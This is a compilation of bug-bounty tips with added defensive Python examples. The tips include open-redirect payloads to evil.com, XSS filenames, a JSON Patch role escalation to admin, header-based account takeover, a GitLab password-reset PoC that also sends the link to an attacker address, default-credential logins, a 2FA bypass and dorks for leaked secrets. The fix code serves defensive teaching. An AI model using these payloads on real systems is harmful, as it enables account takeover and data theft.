When you are looking for bugs like SSRF & Open Redirect and there is a blacklisted character, try to bypass it using other Unicode characters.
I found an Open Redirect bypass using the (。) Chinese dot "%E3%80%82".
PoC: redirect_to=////evil%E3%80%82com
#BugBounty
#bugbountytip
Whenever you find an API endpoint like "/api/v4/anything", add "internal" to the route and you will be surprised 😃. For example:
/api/v4/users/<userid> =>> 403
/api/v4/internal/users/<userid> =>> 200
#bugbountytips
#BugBounty
If you find a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
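The defensive side of the filename trick above, as an added example that is not code from the post: the server never stores or renders the user's filename as-is. It generates its own storage name, validates the extension against a raster-only allowlist (SVG is excluded because it can carry script), strips metacharacters from the name it displays, and HTML-escapes on output. The allowlist, helper names and sample filenames are constructed for the demonstration.

```python
"""Hardening an image upload against script in the filename (added example)."""
import html
import os
import re
import secrets

# Constructed policy: raster formats only. SVG is excluded because it is an XML
# document that may contain <script>, so a ".svg image" is itself an XSS vector.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def split_extension(filename):
    """Extension taken from the *last* dot and lowercased, so
    '"><svg onmouseover=alert(1)>.svg' yields 'svg', not something earlier."""
    base, _, ext = filename.rpartition(".")
    return (base, ext.lower()) if base else (filename, "")


def is_allowed_upload(filename):
    """True when the extension is on the allowlist."""
    return split_extension(filename)[1] in ALLOWED_EXTENSIONS


def storage_name(filename):
    """Name used on disk: random token plus the validated extension.
    The user's text never reaches the filesystem or a URL path."""
    _, ext = split_extension(filename)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def display_name(filename, max_len=64):
    """Cleaned original name for listings and logs: directory components
    dropped, every character outside [A-Za-z0-9._-] removed, length capped."""
    base, ext = split_extension(os.path.basename(filename.replace("\\", "/")))
    cleaned = _UNSAFE_CHARS.sub("", base).strip("._-") or "upload"
    return f"{cleaned[:max_len]}.{ext}" if ext else cleaned[:max_len]


def render_listing(filenames):
    """HTML fragment for a gallery page. Escaping at output time is the real
    defence; display_name() is defence in depth for logs and other sinks."""
    items = "".join(f"<li>{html.escape(name)}</li>" for name in filenames)
    return f"<ul>{items}</ul>"


if __name__ == "__main__":
    sample = "<img src=x onerror=alert('XSS')>.png"  # constructed, from the post's list
    print(storage_name(sample), display_name(sample))
    print(render_listing([sample]))
```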
Many APIs are vulnerable to "JSON Patch", where you have access to the op: you can add, remove, replace, move, copy.
Example:
{ "op": "replace", "path": "/role", "value": "admin" },
More info:
#BugBounty
#bugbountytips
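What the API side should have done with that patch, as an added example that is not code from the post: every RFC 6902 operation is checked against an allowlist of client-editable JSON pointers and a reduced set of ops before anything is applied, so a `replace` on `/role` is refused outright. The user record, the allowlist and the `apply_client_patch` helper are constructed for the demonstration.

```python
"""Allowlisted JSON Patch (RFC 6902) application (added example)."""
import copy

# Constructed policy: the only pointers a client-supplied patch may touch.
CLIENT_EDITABLE_PATHS = {"/profile/displayName", "/profile/bio", "/settings/newsletter"}
# move and copy are refused: they could pull a value from an unlisted path into
# a listed one, and "test" is harmless but unneeded here.
CLIENT_ALLOWED_OPS = {"add", "replace", "remove"}


class PatchRejected(ValueError):
    """Raised when a patch uses an op or a path the client may not."""


def validate_patch(patch):
    """Reject the whole patch if any operation falls outside the allowlist."""
    if not isinstance(patch, list):
        raise PatchRejected("patch must be a JSON array of operations")
    for i, op in enumerate(patch):
        if not isinstance(op, dict):
            raise PatchRejected(f"op #{i}: not an object")
        kind = op.get("op")
        if kind not in CLIENT_ALLOWED_OPS:
            raise PatchRejected(f"op #{i}: {kind!r} is not permitted")
        if op.get("path") not in CLIENT_EDITABLE_PATHS:
            raise PatchRejected(f"op #{i}: path {op.get('path')!r} is not editable")
        if kind in ("add", "replace") and "value" not in op:
            raise PatchRejected(f"op #{i}: {kind} requires a value")


def is_patch_allowed(patch):
    """Boolean form of validate_patch() for callers that just need a decision."""
    try:
        validate_patch(patch)
        return True
    except PatchRejected:
        return False


def _resolve(doc, pointer):
    """Return (parent object, last key) for an RFC 6901 pointer like /profile/bio."""
    keys = [k.replace("~1", "/").replace("~0", "~") for k in pointer[1:].split("/")]
    parent = doc
    for key in keys[:-1]:
        parent = parent.setdefault(key, {})
        if not isinstance(parent, dict):
            raise PatchRejected(f"pointer {pointer!r} crosses a non-object")
    return parent, keys[-1]


def apply_client_patch(document, patch):
    """Validate first, then apply to a deep copy so a rejected patch changes nothing."""
    validate_patch(patch)
    doc = copy.deepcopy(document)
    for op in patch:
        parent, key = _resolve(doc, op["path"])
        if op["op"] == "remove":
            parent.pop(key, None)
        else:  # add and replace both set the member on an object
            parent[key] = op["value"]
    return doc


# Constructed user record as the service might hold it.
USER = {
    "id": 7,
    "role": "user",
    "profile": {"displayName": "old", "bio": ""},
    "settings": {"newsletter": False},
}

if __name__ == "__main__":
    print(apply_client_patch(USER, [{"op": "replace", "path": "/profile/displayName", "value": "new"}]))
    try:
        apply_client_patch(USER, [{"op": "replace", "path": "/role", "value": "admin"}])
    except PatchRejected as err:
        print("rejected:", err)
```

The allowlist is matched on the raw pointer string, so escaping tricks such as `~1` cannot be used to spell an unlisted path, and because `validate_patch` runs over the whole array before any write, a patch that mixes one legitimate op with one on `/role` is dropped as a unit.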
I moved from bug bounty to CTF
And I can confirm CTF is the real hacking,
A bug bounty is just an easy game compared to CTF
bug bounty: vulnerability assessment
CTF: real hacking
GET /api/users/1337 => 401
GET /api/users/
x-user-id: 1337
=>> 200 Ok
POST /api/users/<myID>/password-reset
x-user-id: <victimID>
Full account takeover :).
#bugbountytips
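Both the x-user-id takeover above and the earlier "/internal/" route trick come down to the same two server-side mistakes: identity taken from a header the client controls, and routes that fall outside the policy that guards their public siblings. Here is an added example (not code from the posts) of the shape a fix takes: the caller is resolved from the bearer-token session only, and every path under the API prefix, internal ones included, maps to an explicit policy, with unmatched paths denied. The session store, tokens, user ids and route table are constructed; `authorize_vulnerable` models the weakness the post describes for contrast.

```python
"""Route authorization that never trusts a client-supplied user id (added example)."""
import re

# Constructed session store: bearer token -> (user id, role). In a real service
# this is the server-side session or a verified signed token.
SESSIONS = {
    "tok-alice": (1337, "user"),
    "tok-mallory": (42, "user"),
    "tok-ops": (7, "admin"),
}

# Constructed route table: every path under /api/v4 maps to a policy, and the
# internal prefix is listed explicitly instead of being left to a catch-all.
ROUTES = [
    (re.compile(r"^/api/v4/internal/.*$"), "admin"),
    (re.compile(r"^/api/v4/users/(?P<uid>\d+)$"), "owner"),
    (re.compile(r"^/api/v4/users/(?P<uid>\d+)/password-reset$"), "owner"),
]


def authorize_vulnerable(path, headers):
    """The weakness in the post: identity is read from an x-user-id header the
    client controls, so a reset on another user's id is accepted."""
    if "x-user-id" not in headers:
        return 401
    return 200 if path.startswith("/api/v4/users/") else 404


def current_user(headers):
    """Resolve the caller from the session token only; x-user-id is never read."""
    auth = headers.get("authorization", "")
    if not auth.startswith("Bearer "):
        return None
    return SESSIONS.get(auth[len("Bearer "):])


def authorize(path, headers):
    """HTTP status the request should receive: 200 when the session owner may
    act on this route, 401 without a session, 403 when the policy fails, and
    404 for any path the table does not cover (deny by default)."""
    principal = current_user(headers)
    if principal is None:
        return 401
    uid, role = principal
    for pattern, policy in ROUTES:
        match = pattern.match(path)
        if match is None:
            continue
        if policy == "admin":
            return 200 if role == "admin" else 403
        # "owner": the id in the path must equal the id bound to the session
        return 200 if int(match.group("uid")) == uid else 403
    return 404


if __name__ == "__main__":
    hdrs = {"authorization": "Bearer tok-mallory", "x-user-id": "1337"}
    print(authorize_vulnerable("/api/v4/users/1337/password-reset", {"x-user-id": "1337"}))
    print(authorize("/api/v4/users/1337/password-reset", hdrs))
```

Header names are assumed already lowercased by the framework. The point of the route table is that "/api/v4/internal/..." cannot silently return 200 the way the earlier post shows: it is either matched by an explicit policy or it is a 404.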
Some devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked, such as "access keys", "aws secrets" ...etc.
Dork: site: "$COMPANY"
I already found a lot of leaked critical data.
#bugbountytips
People who are doing bug bounty for Red Bull, please stop.
You are destroying the field.
Don't do bug bounty for free & drinks & T-shirts ...etc.
When companies find stupid hackers like you who work for free, many other companies will join the club.
Please stop.
#BugBounty
I have a friend who joined
#bugbounty
because of me. He didn't have good internet and no PC, just using his phone.
He found 5 bugs using his phone with the worst internet in the world (Algeria).
I really feel proud of this boy <3.
Unknown recon method via
waybackurls $TARGET.app.box.com
or just use a Google dork:
site: "$TARGET"
Sometimes the employees upload sensitive files to the public on .
#bugbountytips
#bugbounty
My goal for 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep.
I'm still looking for happiness ✍️
I used BBOT to enumerate subdomains, and I found new subs I had never seen in my targets!
Very very useful on large targets.
#BugBounty
#bugbountytips
#infosec
Thousands of US companies have been hacked by Chinese hackers using this RCE.
Microsoft Exchange Server Remote Code Execution CVE-2021-26855 exploit.
#BugBounty
#RCE
#infosec
Ok, here is another
#bugbountytip
You can find this issue with "login with Google" too, or any other IdP providers.
During the signup process, delete the email value from the scope 💣
I'm curious why @ECCOUNCIL offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google.
GitLab CE/EE Account Takeover via Password Reset without user interaction, CVE-2023-7028
PoC: in the reset password endpoint
user[email][]=valid@email.com&user[email][]=attacker@email.com
#bugbountytip
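The server-side check that closes this class of bug, as an added example that is neither GitLab's code nor code from the advisory: the reset endpoint accepts exactly one plain `user[email]` string, refuses the array form `user[email][]` and repeated keys, and mails the link only to the address stored on the matching account rather than to anything the request supplied. The Rails-style parameter convention, the account table and the addresses are constructed placeholders.

```python
"""Password-reset request handling that cannot be steered to a second address (added example)."""
from urllib.parse import parse_qs

# Constructed account table: account id -> record, plus an index by verified email.
ACCOUNTS = {1: {"email": "valid@email.com"}}
EMAIL_INDEX = {rec["email"]: aid for aid, rec in ACCOUNTS.items()}


class ResetRejected(ValueError):
    """Raised when the request does not name exactly one plain email string."""


def extract_reset_email(query):
    """Return the single email named in the request, or raise.
    Array-style keys (user[email][]) and repeated keys are refused: a reset
    flow must never fan out to every address the client lists."""
    params = parse_qs(query, keep_blank_values=True)
    if "user[email][]" in params:
        raise ResetRejected("array parameter user[email][] is not accepted")
    values = params.get("user[email]", [])
    if len(values) != 1:
        raise ResetRejected(f"expected exactly one email, got {len(values)}")
    email = values[0].strip().lower()
    if email.count("@") != 1 or email.startswith("@") or email.endswith("@"):
        raise ResetRejected("malformed email")
    return email


def request_is_accepted(query):
    """Boolean form of extract_reset_email() for the HTTP layer."""
    try:
        extract_reset_email(query)
        return True
    except ResetRejected:
        return False


def reset_recipients(query):
    """Addresses the reset link would be mailed to. The value comes from the
    stored account record, never from the request, so it is [] or one address.
    An unknown email yields [] while the HTTP response stays identical, which
    keeps the endpoint from confirming which addresses exist."""
    email = extract_reset_email(query)
    account_id = EMAIL_INDEX.get(email)
    if account_id is None:
        return []
    return [ACCOUNTS[account_id]["email"]]


if __name__ == "__main__":
    # Constructed request bodies: the array form from the post, and a normal one.
    print(request_is_accepted("user[email][]=valid@email.com&user[email][]=attacker@email.com"))
    print(reset_recipients("user[email]=valid@email.com"))
```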
How to use FFUF over multiple hosts
$ while IFS= read -r host; do ffuf -u "$host/FUZZ" -w wordlist.txt -mc 200,302,401 -se; done < host.txt
#bugbountytips
#BugBounty
#ffuf
I just found Open Redirection on a public
#bugbounty
program.
I tried all the Open Redirect payloads {that I know}, and nothing worked, only one payload: redirect_to=//evil.com\@whiteliste.com
I hope this will help you :).
#bugbountytip
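Both this post and the earlier Chinese-dot one are the same validation failure seen from the attacker's side: the server compares a string, the browser resolves a host. Here is an added example, not code from either post, of a redirect-target check written against what the browser will do: backslashes are rejected because WHATWG URL parsing treats `\` like `/` for http(s), protocol-relative targets (`//host`, `////host`) are rejected, userinfo is rejected, and the hostname is IDNA-canonicalised so that `evil。com` is compared as `evil.com`. The allowlist of hosts is constructed, and the function assumes the framework has already percent-decoded the parameter.

```python
"""Redirect-target validation that survives Unicode dots and backslash tricks (added example)."""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com", "www.example.com"}  # constructed allowlist


def canonical_host(hostname):
    """Browser-style host normalisation: lowercase and IDNA-encode. Python's idna
    codec treats U+3002 (。), U+FF0E and U+FF61 as label separators, so
    'evil。com' canonicalises to 'evil.com', which is where a browser would go."""
    try:
        return hostname.strip().lower().encode("idna").decode("ascii")
    except UnicodeError:
        return None


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a same-site relative path or an https URL on an allowlisted host."""
    if not target or any(ch in target for ch in "\r\n\t\x00"):
        return False
    # '//evil.com\@good.com': the browser lands on evil.com while urlsplit
    # reports good.com as the host. Refuse the character rather than guess.
    if "\\" in target:
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash. urlsplit leaves
        # '////evil.com' entirely in path, so the prefix test catches it.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme != "https":
        # Covers protocol-relative '//host' (empty scheme with a netloc),
        # plus javascript:, data:, http: and anything else.
        return False
    if parts.username is not None or parts.password is not None:
        return False  # 'https://evil.com@example.com' style userinfo
    return canonical_host(parts.hostname or "") in allowed_hosts


if __name__ == "__main__":
    # Constructed inputs mirroring the two posts, already percent-decoded.
    for candidate in ("////evil\u3002com", "//evil.com\\@whiteliste.com", "/account", "https://www.example.com/x"):
        print(repr(candidate), is_safe_redirect(candidate))
```

Comparing the canonicalised host rather than the raw string is what makes the check and the browser agree; rejecting protocol-relative targets and backslashes outright avoids having to reason about every parser difference individually.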
A technique to bypass 2FA that I did not see in any place.
Please tell me if it's public.
Steps:
1. Enable 2FA in your account
2. Log in and send the 2FA code to your email & SMS.
3. Wait until the 2FA code expires (it depends ..)
4. Put any code.
5. b00M!
#bugbountytips
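A server-side verifier that cannot fail the way the post describes, as an added example that is not code from the post. How the bug arises on the server is an assumption made here for the contrast function `verify_vulnerable`: an expired pending-code record is treated as "no second factor outstanding" and the login goes through. The hardened `verify` fails closed on expiry, limits attempts, compares in constant time and burns the code after one use. The code value, timestamps and limits are constructed.

```python
"""Second-factor verification that fails closed when the code has expired (added example)."""
import hmac
import secrets
from dataclasses import dataclass

CODE_TTL_SECONDS = 300  # constructed lifetime
MAX_ATTEMPTS = 5        # constructed guess limit per issued code


@dataclass
class PendingCode:
    code: str
    issued_at: float
    attempts: int = 0
    used: bool = False


def issue_code(now, digits=6):
    """Create a fresh pending code; secrets.randbelow keeps it unpredictable."""
    return PendingCode(code=f"{secrets.randbelow(10 ** digits):0{digits}d}", issued_at=now)


def verify_vulnerable(pending, submitted, now):
    """Assumed shape of the bug in the post: expiry is checked first and an
    expired (or missing) record is treated as nothing left to verify, so the
    second factor is skipped and any submitted value passes."""
    if pending is None or now - pending.issued_at > CODE_TTL_SECONDS:
        return True
    return submitted == pending.code


def verify(pending, submitted, now):
    """Fail closed: missing, used, expired, over-tried or mismatched codes all
    return False. The record is counted against before comparison and burned
    after success, so a code is accepted at most once."""
    if pending is None or pending.used:
        return False
    if now - pending.issued_at > CODE_TTL_SECONDS:
        return False  # expired: the user must request a new code
    if pending.attempts >= MAX_ATTEMPTS:
        return False
    pending.attempts += 1
    if not hmac.compare_digest(submitted.encode(), pending.code.encode()):
        return False
    pending.used = True
    return True


if __name__ == "__main__":
    pending = PendingCode(code="123456", issued_at=1000.0)  # constructed record
    print(verify_vulnerable(pending, "000000", 1000.0 + CODE_TTL_SECONDS + 1))
    print(verify(pending, "000000", 1000.0 + CODE_TTL_SECONDS + 1))
```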
20,000 people follow me, I don't know why there are so many people following this useless guy.
I don't deserve all these followers at all, but thanks everyone.
CVE-2024-27130, an unauthenticated stack overflow bug which allows remote code execution on QNAP.
Credit: @watchtowrcyber
Yes yes it is Friday, the perfect day to drop the 0day
Do not forget to try logging in with these credentials in your
#bugbounty
target:
Email: demo@<company>.com & test<company>.com
Password: demo@<company>.com, 123456789, 123456, root, ..other default passwords.
You will log in to the company as an admin if you are lucky.
#bugbountytip
Someone is fasting and wrote <javascript> instead of <script> 😂😂😂😂😂
I spent 20 min figuring out why my code is not working 😂😂😂😂
#javascript
#RamadanMubarak
Instagram fixed my 2FA bypass and closed my report as informative, and they said the bug is not working! And I still have a video where I recorded the PoC.
Any suggestions, guys?
#BugBounty
If you find apollo-server exposed on /api/graphql, you can manipulate the embedded page via the endpoint URL param and inject your own host to receive the GraphQL query (steal users' information ..etc).
#bugbounty
#bugbountytips
FU*K this shit, after hours of writing on @Medium the post didn't save,
now I need to rewrite it again.
I believe Medium is the worst place to share write-ups, is there any alternative?